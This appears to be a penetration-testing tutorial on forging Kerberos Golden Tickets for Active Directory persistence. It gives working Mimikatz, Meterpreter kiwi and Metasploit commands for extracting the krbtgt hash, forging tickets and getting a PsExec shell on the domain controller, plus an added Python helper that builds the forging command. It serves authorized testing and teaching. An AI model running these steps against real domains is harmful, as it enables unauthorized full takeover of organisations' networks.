Network penetration tests usually stop once the consultant has obtained domain administrator access. However, domain persistence might be necessary if there is project time left to spend and there is a concern that access might be lost for a variety of reasons, such as:

  • Change of compromised Domain Admin Password
  • Detection of new domain administrator account

Benjamin Delpy discovered the Golden Ticket attack and since then various articles have been written on this topic, and threat actors (Bronze Butler) are using it for domain persistence. The technique abuses the trust model of the Kerberos authentication protocol in order to impersonate any user, valid or invalid. A TGT (ticket granting ticket) is encrypted with the key of the krbtgt account, and the KDC accepts any TGT it can decrypt with that key without first checking that the user named in it exists (the account is only validated for TGTs older than 20 minutes). Whoever holds the krbtgt key can therefore mint a TGT for an arbitrary username with arbitrary group memberships, and a session holding such a TGT is trusted by Kerberos and can access any resource in the network.

Mimikatz and its Meterpreter extension kiwi support the creation of a golden ticket, and Metasploit Framework has a post-exploitation module which automates the activity. The creation of a golden ticket requires the following information:

  • Domain Name
  • Domain SID
  • Username to impersonate
  • krbtgt NTLM hash

Discovery of Golden Ticket Prerequisites

The domain name and the domain SID can be obtained very easily by executing the whoami /user command (the domain SID is the user's SID without the trailing RID) or with the PsGetsid utility from PsTools.

whoami /user
PsGetsid64.exe pentestlab.local
Domain SID
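
As an added example (not part of the original post), the following Python derives the domain SID from the account SID that whoami /user prints, by dropping the trailing RID, and validates each parameter before assembling the kerberos::golden command line. The whoami output below is a constructed sample; note that whoami reports the NetBIOS domain name, whereas mimikatz expects the DNS domain name in /domain, so that value is passed separately. The /id and /groups options are real kerberos::golden switches; the defaults used here are mimikatz's own defaults.

```python
"""Derive the domain SID from `whoami /user` output and build a validated
kerberos::golden line. Added example; not code from the original post."""
import re

# Constructed sample of `whoami /user` output on a domain-joined host.
WHOAMI_OUTPUT = """
USER INFORMATION
----------------

User Name            SID
==================== =============================================
pentestlab\\test     S-1-5-21-3737340914-2019594255-2413685307-1105
"""

DOMAIN_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+$")          # no RID
ACCOUNT_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-\d+$")     # domain SID + RID
WHOAMI_LINE_RE = re.compile(
    r"^(?P<domain>[^\\\s]+)\\(?P<user>\S+)\s+(?P<sid>S-1-5-21-\d+-\d+-\d+-\d+)\s*$"
)


def domain_sid_from_account_sid(sid):
    """A domain account SID is <domain SID>-<RID>; drop the last component."""
    if not ACCOUNT_SID_RE.fullmatch(sid):
        raise ValueError(f"not a domain account SID: {sid}")
    return sid.rsplit("-", 1)[0]


def parse_whoami_user(output):
    """Return (NetBIOS domain, domain SID) from the text `whoami /user` prints."""
    for line in output.splitlines():
        m = WHOAMI_LINE_RE.match(line)
        if m:
            return m.group("domain"), domain_sid_from_account_sid(m.group("sid"))
    raise ValueError("no domain account line found in whoami /user output")


def golden_ticket_command(user, dns_domain, domain_sid, krbtgt_ntlm,
                          rid=500, groups=(513, 512, 520, 518, 519)):
    """Build the mimikatz kerberos::golden line after checking each input.

    rid/groups default to what mimikatz uses when /id and /groups are omitted
    (RID 500 and the Domain Users/Admins/Group Policy/Schema/Enterprise Admins groups).
    """
    if not DOMAIN_SID_RE.fullmatch(domain_sid):
        raise ValueError(f"domain SID must be S-1-5-21-X-Y-Z without a RID: {domain_sid}")
    if not re.fullmatch(r"[0-9a-fA-F]{32}", krbtgt_ntlm):
        raise ValueError("krbtgt NTLM hash must be 32 hex characters")
    return (f"kerberos::golden /user:{user} /domain:{dns_domain} /sid:{domain_sid} "
            f"/krbtgt:{krbtgt_ntlm.lower()} /id:{rid} "
            f"/groups:{','.join(str(g) for g in groups)} /ptt")


if __name__ == "__main__":
    netbios, sid = parse_whoami_user(WHOAMI_OUTPUT)
    print(netbios, sid)
    print(golden_ticket_command("evil", "pentestlab.local", sid,
                                "d125e4f69c851529045ec95ca80fa37e"))
```

The RID check matters in practice: pasting a user SID (with its RID) into /sid produces a ticket the KDC rejects, which is the most common reason a golden ticket "does not work".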

The NTLM hash of the krbtgt account can be obtained via the following methods: 

  1. DCSync (Mimikatz)
  2. LSA (Mimikatz)
  3. Hashdump (Meterpreter)
  4. NTDS.DIT
  5. DCSync (Kiwi)

DCSync is a Mimikatz feature which impersonates a domain controller and requests account password data from the targeted domain controller through directory replication (it requires replication rights, which Domain Admins have by default). This technique is less noisy as it doesn't require direct access to the domain controller or retrieving the NTDS.DIT file over the network, although the replication request itself is logged on the domain controller (event ID 4662) and is a common detection point.

lsadump::dcsync /user:krbtgt
Mimikatz - krbtgt NTLM Hash

Alternatively, Mimikatz can retrieve the hash of the krbtgt account from the Local Security Authority (LSA) by executing Mimikatz on the domain controller itself.

privilege::debug
lsadump::lsa /inject /name:krbtgt
Mimikatz - krbtgt NTLM Hash via LSA Dump

If there is a Meterpreter session with the domain controller the quickest method is the hashdump command:

Meterpreter - krbtgt NTLM Hash

The Kiwi extension also supports the DCSync method and can retrieve the SID, LM and NTLM hashes.

dcsync_ntlm krbtgt
Metasploit Kiwi DCSync - Retrieve the NTLM Hash

Mimikatz

A forged Golden ticket can be created with Mimikatz by using the obtained information.

kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
Mimikatz - Golden Ticket Creation

The kerberos::list command will list all the Kerberos tickets available in the current session, and kerberos::tgt will show the TGT that has been submitted for the current user session.

kerberos::list
kerberos::tgt
Mimikatz - Kerberos Tickets

Since the ticket was generated with the NTLM hash of the krbtgt account, Kerberos trusts it by default, and the PAC that Mimikatz embeds in it places the user in Domain Admins (group RIDs 513, 512, 520, 518 and 519 unless /groups is specified). Any username, valid or invalid and regardless of the real account's privileges, therefore has unrestricted network access including access to the domain controller. This can be confirmed by listing the admin share on the domain controller.

dir \\WIN-PTELU2U07KG\C$
Golden Ticket - Executing Commands on the Domain Controller as standard user

Attempts to list the same share as user test without the Golden Ticket will fail.

Run a Command on the DC before Golden Ticket

Listing DC Admin Share without Golden Ticket

Shell access to the domain controller is also possible with the PsExec utility. Kerberos will grant access using the ticket in the current session even though the user 'evil' is not a valid account.

PsExec64.exe \\WIN-PTELU2U07KG cmd.exe
Golden Ticket - Shell with PsExec as invalid user

Examining the list of domain users on the domain controller shows that the user evil doesn't exist, yet it has domain administrator access.

Domain Users - Absence of evil user

It should be noted that the NetBIOS or DNS hostname should be used so that Kerberos authentication is attempted. Attempts to access the same resources by IP address will fail with an access denied error, since no SPN matches an IP address and the client falls back to NTLM authentication instead of presenting the ticket.

Metasploit

In the scenario where domain administrator access has been obtained on the network and Metasploit Framework is used heavily in the assessment, there is a Metasploit module which automates the creation of the golden ticket.

post/windows/escalate/golden_ticket

The module will try to obtain the required data automatically; however, since the information has already been retrieved, it can be supplied manually.

Metasploit - Golden Ticket Module Configuration

Metasploit will create, store and apply the ticket automatically to an existing Meterpreter session.

Metasploit - Golden Ticket

Kiwi

Mimikatz has been ported to Metasploit Framework as an extension called kiwi. From a Meterpreter session, kiwi can be loaded by running the following:

meterpreter > load kiwi

The Golden Ticket can be created with kiwi by executing the following command:

golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
Metasploit Kiwi - Golden Ticket

In order to apply the ticket to the existing session, kerberos_ticket_use needs to be used:

kerberos_ticket_use /root/Downloads/pentestlabuser.tck

Verify that there is a Kerberos ticket for the current session:

kerberos_ticket_list
Metasploit Kiwi - List of Kerberos Tickets

Resources on the domain controller can now be accessed as pentestlabuser, an account that doesn't exist.